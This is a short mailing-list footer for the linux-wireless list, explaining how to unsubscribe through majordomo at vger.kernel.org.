To unsubscribe from this list: send the line "unsubscribe linux-wireless" in
the body of a message to majord...@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html